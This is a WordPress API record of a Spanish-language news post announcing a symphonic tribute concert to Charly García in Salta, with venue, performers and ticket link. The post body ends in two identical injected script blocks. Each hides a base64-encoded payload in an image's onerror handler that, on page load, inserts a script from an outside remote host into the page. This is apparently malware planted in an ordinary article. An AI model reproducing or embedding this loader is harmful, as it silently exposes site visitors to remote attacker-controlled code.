{"id":2843,"date":"2023-07-12T12:42:00","date_gmt":"2023-07-12T15:42:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2843"},"modified":"2025-08-14T00:12:57","modified_gmt":"2025-08-14T03:12:57","slug":"rasguna-las-piedras-homenaje-sinfonico-a-charly-garcia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2843","title":{"rendered":"Rasgu\u00f1a las Piedras: homenaje sinf\u00f3nico a Charly Garc\u00eda"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-background-color has-background\"><em>Hoy mi\u00e9rcoles 12 de julio a las 20, la Camerata Stradivari ofrecer\u00e1 un nuevo concierto en el marco de los homenajes a grandes compositores argentinos. El mismo tendr\u00e1 lugar en el Teatro Provincial \u201cJuan Carlos Saravia\u201d (Zuvir\u00eda 70).<\/em><\/h4>\n\n\n\n<p>En esta ocasi\u00f3n la agrupaci\u00f3n llevar\u00e1 al espectador a la Argentina del rock de los a\u00f1os 70\u2019s y 80\u2019s, con las canciones del rockstar m\u00e1s emblem\u00e1tico del pa\u00eds. Ser\u00e1 un recorrido narrado por las fuertes l\u00edricas de las distintas agrupaciones de Charly, como Sui Generis, Ser\u00fa Gir\u00e1n, La M\u00e1quina de hacer P\u00e1jaros y su etapa solista.<\/p>\n\n\n\n<p>La funci\u00f3n contar\u00e1 con las voces de Camag\u00fcira, d\u00fao formado por Santiago Lamagni y Andrea Rico, que ser\u00e1n acompa\u00f1adas por la orquesta cuya direcci\u00f3n general est\u00e1 a cargo de la maestra Inga Iordanishivili y arreglos orquestales escritos por Jonathan Paredes. Tambi\u00e9n se destacar\u00e1n en el escenario las voces de Emilio Jorge y Celeste Mart\u00edn.<\/p>\n\n\n\n<p>Entrada General de $3000 a la venta en\u00a0<a href=\"https:\/\/entradauno.com\/12658-rasguna-las-piedras---homenaje-sinfonico-a-charly-garcia\/12658?h=5358410c1642052095e313f09066a506dbb0bd23\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/entradauno.com\/12658-rasguna-las-piedras&#8212;homenaje-sinfonico-a-charly-garcia\/12658?h=5358410c1642052095e313f09066a506dbb0bd23<\/a><\/p>\n\n\n\n<p>\u00abFundaci\u00f3n Camerata Stradivari\u00bb, bajo la direcci\u00f3n de la Maestra Inga Iordanishvili, es un proyecto inclusivo e integrador que brinda formaci\u00f3n y perfeccionamiento en diversos instrumentos a trav\u00e9s de su Orquesta Sinf\u00f3nica, su Orquesta de c\u00e1mara y Coro.\u00bb<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/rasgunia-las-piedras-homenaje-sinfonico-a-charly-garcia-90638\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Hoy mi\u00e9rcoles 12 de julio a las 20, la Camerata Stradivari ofrecer\u00e1 un nuevo concierto en el marco de los homenajes a grandes compositores argentinos. El mismo tendr\u00e1 lugar en el Teatro Provincial \u201cJuan Carlos Saravia\u201d (Zuvir\u00eda 70). En esta ocasi\u00f3n la agrupaci\u00f3n llevar\u00e1 al espectador a la Argentina del rock de los a\u00f1os 70\u2019s [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2844,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-2843","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2843"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2843"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2843\/revisions"}],"predecessor-version":[{"id":7028,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2843\/revisions\/7028"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2844"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2843"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2843"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2843"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}